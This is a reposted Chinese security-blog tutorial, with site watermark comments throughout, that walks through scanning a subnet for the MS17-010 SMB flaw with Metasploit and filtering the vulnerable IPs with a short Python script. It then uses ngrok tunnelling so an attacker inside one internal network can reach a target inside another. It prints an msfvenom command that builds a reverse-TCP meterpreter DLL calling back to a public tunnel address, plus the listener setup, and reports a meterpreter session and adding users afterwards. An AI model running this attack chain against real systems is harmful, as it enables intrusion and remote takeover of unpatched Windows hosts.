安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 网络安全 > MS17-010漏洞检测与内网穿透技术的应用

MS17-010漏洞检测与内网穿透技术的应用

时间:2017-05-16来源:未知 作者:安云网点击:
http://www.tuicool.com/articles/MbmmaaY 本文主要介绍一下MSF模块的下载、使用,以及当攻击机处于内网,而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下,并没有新的知识点,可以为刚入门的新手抛砖引玉,提供一条

http://www.tuicool.com/articles/MbmmaaY

//copyright AnYun.ORG


//copyright AnYun.ORG

本文主要介绍一下MSF模块的下载、使用,以及当攻击机处于内网,而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下,并没有新的知识点,可以为刚入门的新手抛砖引玉,提供一条解决问题的思路,同时也记录一下过程,加强记忆。 //内容来自安云网

主要分为两个知识点,一是SMB漏洞的批量检测,二是内网穿透技术。

//安云网咨询系统

首先是环境的搭建,具体如下表所示:

//内容来自AnYun.ORG

主机IP备注
Kali 64位192.168.232.134攻击机
Windows XP 32位192.168.232.128安装了python2.6,下载有方程式利用工具包(主要为Windows目录下的工具)
Window2008 R2 64位10.50.2.62靶机,存在MS17-010漏洞,并可以访问外网

0x01 SMB漏洞批量检测

1.扫描脚本的下载和加载

由于Metasploit还没有更新MS17-010检测的模块,所以要去exploit-db下载,并在MSF中加载。

//内容来自安云网

[email protected]:~# cd /usr/share/metasploit-framework/modules/auxiliary/scanner/[email protected]:/usr/share/metasploit-framework/modules/auxiliary/scanner/smb# wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb //安云网咨询系统 

//copyright AnYun.ORG

启动Metasploit,模块会自动加载,或者使用命令 reload_all 重新加载所有模块。

//安云网,anyun.org

2.漏洞扫描的使用方法

选择使用smb_ms_17_010模块,并查看使用命令。

//安云网,anyun.org

msf > use auxiliary/scanner/smb/smb_ms_17_010
msf auxiliary(smb_ms_17_010) > show options 

//安云网咨询系统

//copyright AnYun.ORG

所必须的参数有三个,对于无需登录的SMB,我们只需设置一下扫描的IP段、线程并运行即可开始扫描。

//内容来自AnYun.ORG

msf auxiliary(smb_ms_17_010) > set RHOSTS 10.50.2.1-255RHOSTS => 10.50.2.1-255msf auxiliary(smb_ms_17_010) > set THREADS 10THREADS => 10msf auxiliary(smb_ms_17_010) > run 
//内容来自AnYun.ORG

//ANYUN.ORG

出现黄色警告的表示可能存在,需要进一步验证。 //安云网咨询系统

为了方便将存在漏洞的IP列出来,写了一个简单的Python脚本。 //内容来自AnYun.ORG

import reif __name__ == '__main__':    f = open("smb.txt", mode='r', buffering=1)    while(True):            line = f.readline()            if line :                if  "likely" in line:                    print line.split(' ')[1].split(':')[0]            else:                break //安云网咨询系统 

提取出的IP如下所示: //copyright AnYun.ORG

.....
10.50.2.5210.50.2.6210.50.2.6510.50.2.6110.50.2.6310.50.2.6410.50.2.7610.50.2.6910.50.2.7710.50.2.7810.50.2.79.... 
//内容来自AnYun.ORG

有了存在漏洞的地址,接下来将开始对其进行验证,以10.50.2.62为例。 //copyright AnYun.ORG

由于Kali在虚拟机,宿主机IP为2.0. . ,目标机在10.50.2.*。相当于需要从内网到另一个内网, 选择采用了ngrok进行tcp的端口转发来实现内网的穿透。

//安云网,anyun.org

0x02 内网穿透

这里采用了www.ngrok.cc平台进行演示,类似这样的平台有很多,例如natapp.cn等。 //本文来自安云网

注册并开通隧道,如图所示。

//ANYUN.ORG

//本文来自安云网

下载对应的客户端,下载地址为: https://www.ngrok.cc/#down-client ,选择与系统对应的软件。 //本文来自安云网

我这里Kali为64位的,下载和使用命令如下: //copyright AnYun.ORG

[email protected]:~/Downloads# wget hls.ctopus.com/sunny/[email protected]:~/Downloads# unzip [email protected]:~/Downloads# cd linux_amd64/[email protected]:~/Downloads/linux_amd64# [email protected]:~/Downloads/linux_amd64# ./sunny clientid 隧道ID //copyright AnYun.ORG 

//安云网咨询系统

出现下图的界面表示运行成功。

//copyright AnYun.ORG

//copyright AnYun.ORG

使用如下命令生成用于监听的dll文件。监听的IP为server.ngrok.cc的地址,端口为开通隧道时填写的远程端口。

//安云网咨询系统

[email protected]:~/Documents# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=47.90.92.56 LPORT=6266 -f dll > got.dll 
//内容来自AnYun.ORG

//内容来自安云网

然后在Kali上设置监听本机的IP和端口,也就是在开通隧道时填写的本地端口。

//内容来自安云网

use exploit/multi/handlerset LHOST 192.168.232.134set LPORT 5555set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > exploit //copyright AnYun.ORG 

//内容来自安云网

由于关于Eternalblue利用方法有很多教程了,这里就不详细说明了,如图所示。

//安云网咨询系统

//本文来自安云网

攻击成功时查看ngrok客户端发现有一个连接。 //内容来自安云网

//本文来自安云网

而且Kali上也生成了一个meterpreter会话。 //本文来自安云网

//本文来自安云网

之后的操作就很简单了,可以添加用户等等。 //ANYUN.ORG

最后远程登录成功如下图所示。

//安云网咨询系统

//内容来自AnYun.ORG

使用natapp也是可以的。 //内容来自AnYun.ORG

//本文来自安云网

0x03 总结

本文主要以MS17-010为例,讲解了如何下载和利用Metasploit中没有的模块,以及如何解决内网到内网的穿透的问题,当然解决的方法还有很多,这里就不再介绍了。

//安云网,anyun.org

没有什么新的知识,怕忘记所以记录一下~~

//本文来自安云网


//内容来自AnYun.ORG

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容